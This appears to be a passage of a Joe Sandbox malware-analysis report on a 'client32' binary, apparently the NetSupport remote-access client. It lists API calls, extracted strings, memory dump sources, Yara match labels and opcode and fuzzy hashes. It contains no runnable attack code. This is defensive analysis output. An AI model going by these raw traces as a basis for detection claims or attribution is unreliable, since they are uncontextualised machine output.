• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CreateName$ModulePathShort_strrchr
                                                                                                                                                    • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                                                                                                    • API String ID: 1318148156-3179819359
                                                                                                                                                    • Opcode ID: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
                                                                                                                                                    • Instruction ID: 97078bb132b3f47e4dd387b208782a62a76e0766a2a430eba886c9c4ac9a83c1
                                                                                                                                                    • Opcode Fuzzy Hash: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
                                                                                                                                                    • Instruction Fuzzy Hash: 1A318130A44725AFD320DF64C891BD6B7F4BB1D708F008568E2A99B6C5D7B1B588CF94
                                                                                                                                                    APIs
                                                                                                                                                    • _memmove.LIBCMT ref: 11081859
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                                                                                    • String ID: !m_bReadOnly$..\CTL32\DataStream.cpp$IsA()$m_nLength>=nBytes$nBytes>=0$pData
                                                                                                                                                    • API String ID: 1528188558-3417006389
                                                                                                                                                    • Opcode ID: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
                                                                                                                                                    • Instruction ID: 6b38151c30adb73325f8e92f0dfc04dea1f0409a136c72edecfa6b672fa6b7b9
                                                                                                                                                    • Opcode Fuzzy Hash: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
                                                                                                                                                    • Instruction Fuzzy Hash: 1A210B3DF187617FC602DE45BC83F9BF7E45F9165CF048039EA4627241E671A804C6A2
                                                                                                                                                    APIs
                                                                                                                                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 1103F76C
                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000471,?), ref: 1103F784
                                                                                                                                                    • DestroyCursor.USER32(00000000), ref: 1103F7A1
                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000471,00000000), ref: 1103F7B4
                                                                                                                                                    • UpdateWindow.USER32(00000000), ref: 1103F7F2
                                                                                                                                                      • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 1103F7E1
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1103F7DC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemText$CursorDestroyExtractIconUpdateWindow_strrchr
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 3726914545-2830328467
                                                                                                                                                    • Opcode ID: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
                                                                                                                                                    • Instruction ID: 7fabd73ab2c015b19e51bb87ae7bab873905cbda80a3d362d09b7776c5ddc496
                                                                                                                                                    • Opcode Fuzzy Hash: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
                                                                                                                                                    • Instruction Fuzzy Hash: 4C21D1B9B40315BFE6219AA1DC86F5BB7A8AFC5B05F104418F79A9B2C0DBB4B4008756
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 1115F62F
                                                                                                                                                    • _memset.LIBCMT ref: 1115F64B
                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 1115F65C
                                                                                                                                                      • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                                                                                      • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                                                                                    • CheckMenuItem.USER32(?,00000000,00000000), ref: 1115F698
                                                                                                                                                    • EnableMenuItem.USER32(?,00000000,00000000), ref: 1115F6AE
                                                                                                                                                    • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1115F6C4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$_memset$CheckCountEnableInfoVersion
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 176136580-4108050209
                                                                                                                                                    • Opcode ID: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                                                                                                    • Instruction ID: be0221c4a5135c336c62c383b80ea9a6d71c1dc3530fa78f313eaeef8d4c2bd6
                                                                                                                                                    • Opcode Fuzzy Hash: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                                                                                                    • Instruction Fuzzy Hash: C621A17591111AABE741DB74CE84FAFBBACEF46358F104025F961E6160DB74DA00C772
                                                                                                                                                    APIs
                                                                                                                                                    • _memmove.LIBCMT ref: 1108132F
                                                                                                                                                    • _memset.LIBCMT ref: 11081318
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastMessageProcess_memmove_memsetwsprintf
                                                                                                                                                    • String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
                                                                                                                                                    • API String ID: 75970324-4264523126
                                                                                                                                                    • Opcode ID: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                                                                                    • Instruction ID: 3f790bad6e390bc8ea8a8f21c3872a9d67b2f4e4425326796fba8d3d5e2d5bab
                                                                                                                                                    • Opcode Fuzzy Hash: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                                                                                    • Instruction Fuzzy Hash: 6B11EB7DF143126FC605DF41EC43F9AF3D4AF9064CF108039E94A27241E571B808C6A1
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindow.USER32(00000000), ref: 1103F466
                                                                                                                                                    • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
                                                                                                                                                    • IsWindow.USER32(00000000), ref: 1103F484
                                                                                                                                                    • Sleep.KERNEL32(00000014), ref: 1103F497
                                                                                                                                                    • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
                                                                                                                                                    • IsWindow.USER32(00000000), ref: 1103F4AF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$Find$Sleep
• String ID: PCIVideoSlave32
• API String ID: 2137649973-2496367574
• Opcode ID: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
• Instruction ID: 349d86511175fe1d1df632f2bffc72f1f56a45a46628263fa2557b0125cca1c8
• Opcode Fuzzy Hash: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
• Instruction Fuzzy Hash: 44F0A473A4122A6EDB01EFF98DC4FA6B7D8AB84699F410074E968D7109F634E8014777
APIs
• LoadMenuA.USER32(00000000,00002EFF), ref: 1100340E
• GetSubMenu.USER32(00000000,00000000), ref: 1100343A
• GetSubMenu.USER32(00000000,00000000), ref: 1100345C
• DestroyMenu.USER32(00000000), ref: 1100346A
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
• String ID: ..\CTL32\annotate.cpp$hMenu$hSub
• API String ID: 468487828-934300333
• Opcode ID: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
• Instruction ID: 1378fb0f7ab2c0978cd4d50cac7dc25882af45c4d25f08e40c7e232078aa5069
• Opcode Fuzzy Hash: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
• Instruction Fuzzy Hash: B3F0E93AE9063573E25252A71C86F9FE2488B45699F500032F926BA580EA14B80043E9
APIs
• LoadMenuA.USER32(00000000,00002EF9), ref: 1100331D
• GetSubMenu.USER32(00000000,00000000), ref: 11003343
• GetMenuItemCount.USER32(00000000), ref: 11003367
• DestroyMenu.USER32(00000000), ref: 11003379
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
• String ID: ..\CTL32\annotate.cpp$hMenu$hSub
• API String ID: 4241058051-934300333
• Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
• Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
• Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
• Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9
APIs
• GetWindowTextA.USER32(?,?,00000050), ref: 11025766
• _strncat.LIBCMT ref: 1102577B
• SetWindowTextA.USER32(?,?), ref: 11025788
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025814
• GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025828
• SetDlgItemTextA.USER32(?,00001397,?), ref: 11025840
• SetDlgItemTextA.USER32(?,00001395,?), ref: 11025852
• SetFocus.USER32(?), ref: 11025855
  • Part of subcall function 11025260: GetDlgItem.USER32(?,?), ref: 110252B0
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3832070631-0
                                                                                                                                                    • Opcode ID: 2b61e4ef957feb7ce17a8024798aa9246a1c5d1c409547fc379c5c00eb05ef8b
                                                                                                                                                    • Instruction ID: bfe7d5249f4b6e1d02486e1e3511efca77028c7631b8c8a816f62769cf0b8b3d
                                                                                                                                                    • Opcode Fuzzy Hash: 2b61e4ef957feb7ce17a8024798aa9246a1c5d1c409547fc379c5c00eb05ef8b
                                                                                                                                                    • Instruction Fuzzy Hash: 5D41A1B1A40349ABE710DB74CC85BBAF7F8FB44714F004969E62A97680EBB4A904CB54
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,111323D6,00000000,?), ref: 110EF7A8
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,111323D6,00000000,?), ref: 110EF7BD
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110EF7DF
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 110EF7EC
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110EF7FB
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 110EF80B
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 110EF825
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 110EF82C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3489003387-0
                                                                                                                                                    • Opcode ID: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                                                                                                    • Instruction ID: 752bd59a7f8b278135cd4218b820f19d57544efb101fbb4cfc0774b0aabdd1bf
                                                                                                                                                    • Opcode Fuzzy Hash: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                                                                                                    • Instruction Fuzzy Hash: 3721C532A41019AFD704DFA5CA89AFEB7FCEB4421AF0001AEF91997540DF709901C7E2
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C5F
                                                                                                                                                      • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C6D
                                                                                                                                                    • GetParent.USER32(00000000), ref: 11089996
                                                                                                                                                    • GetParent.USER32(00000000), ref: 110899A7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ParentWindow
                                                                                                                                                    • String ID: .chm$.hlp$WinHelp cmd=%d, id=%d, file=%s$debughlp.$$$
                                                                                                                                                    • API String ID: 3530579756-3361795001
                                                                                                                                                    • Opcode ID: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                                                                                                    • Instruction ID: dcd0680657676d00064f31b5da51888b306acc0f32f54203c3ee3b251bcfdaac
                                                                                                                                                    • Opcode Fuzzy Hash: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                                                                                                    • Instruction Fuzzy Hash: F5712774E0426AAFDB11DFA4DD81FEFB7E8EF85308F4040A5E909A7241E771A944CB91
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018BE8,1EF76653,?,?,?,111CD988,11187878,000000FF,?,1101ABB2), ref: 110DEB61
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 1101B776
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1101B791
                                                                                                                                                    • LoadLibraryA.KERNEL32(NSSecurity.dll,00000000,111CD988), ref: 1101B7AE
                                                                                                                                                      • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                                                                                    Strings
                                                                                                                                                    • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
                                                                                                                                                    • NSSecurity.dll, xrefs: 1101B7A3
                                                                                                                                                    • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                                                                                    • String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                                                                                                    • API String ID: 3515807602-1044166025
                                                                                                                                                    • Opcode ID: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                                                                                                    • Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
                                                                                                                                                    • Opcode Fuzzy Hash: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                                                                                                    • Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,1EF76653,76967CB0,76967AA0,?,76967CB0,76967AA0), ref: 11071824
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 11071838
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110719B1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$queue$r->queue != queue
                                                                                                                                                    • API String ID: 624642848-3840833929
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                                                                                      • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                                                                                      • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                                                                                      • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                                                                                      • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 110935E9
                                                                                                                                                    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 11093617
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 11093640
                                                                                                                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109366E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 3136964118-2830328467
                                                                                                                                                    APIs
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,?), ref: 110ED801
                                                                                                                                                    • _free.LIBCMT ref: 110ED81C
                                                                                                                                                      • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                      • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                    • _malloc.LIBCMT ref: 110ED82E
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110ED85A
                                                                                                                                                    • _free.LIBCMT ref: 110ED8E3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: QueryValue_free$ErrorFreeHeapLast_malloc
                                                                                                                                                    • String ID: Error %d getting %s
                                                                                                                                                    • API String ID: 582965682-2709163689
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F9A9
                                                                                                                                                      • Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 111612FB
                                                                                                                                                      • Part of subcall function 111612E6: __CxxThrowException@8.LIBCMT ref: 11161310
                                                                                                                                                      • Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 11161321
                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F9CA
                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F9E5
                                                                                                                                                    • _memmove.LIBCMT ref: 1100FA4D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                    • API String ID: 443534600-4289949731
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 6CA86D0A
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 6CA86D72
                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,6CA8B586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 6CA86DCC
                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,000000C8,7572E010,?,6CA8B586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 6CA86DD6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: AddressErrorLastProc
• String ID: InternetQueryDataAvailable$InternetReadFile
• API String ID: 199729137-1434219782
APIs
  • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
  • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,757323A0,1100BF7B), ref: 11110928
  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
• WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
• SetPriorityClass.KERNEL32(?,?), ref: 1103D167
• IsWindow.USER32(?), ref: 1103D17E
• SendMessageA.USER32(?,0000004A,000A0036,00000492), ref: 1103D1B8
• _free.LIBCMT ref: 1103D1BF
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
• String ID: Show16
• API String ID: 625148989-2844191965
APIs
  • Part of subcall function 6CA97D00: __vswprintf.LIBCMT ref: 6CA97D26
  • Part of subcall function 6CA85060: _free.LIBCMT ref: 6CA8506A
  • Part of subcall function 6CA85060: _malloc.LIBCMT ref: 6CA85090
• _free.LIBCMT ref: 6CA8AF0A
  • Part of subcall function 6CAA1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6CAA1C13
  • Part of subcall function 6CAA1BFD: GetLastError.KERNEL32(00000000), ref: 6CAA1C25
• _free.LIBCMT ref: 6CA8AF39
  • Part of subcall function 6CA97B60: _sprintf.LIBCMT ref: 6CA97B77
  • Part of subcall function 6CA977E0: _free.LIBCMT ref: 6CA977EF
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
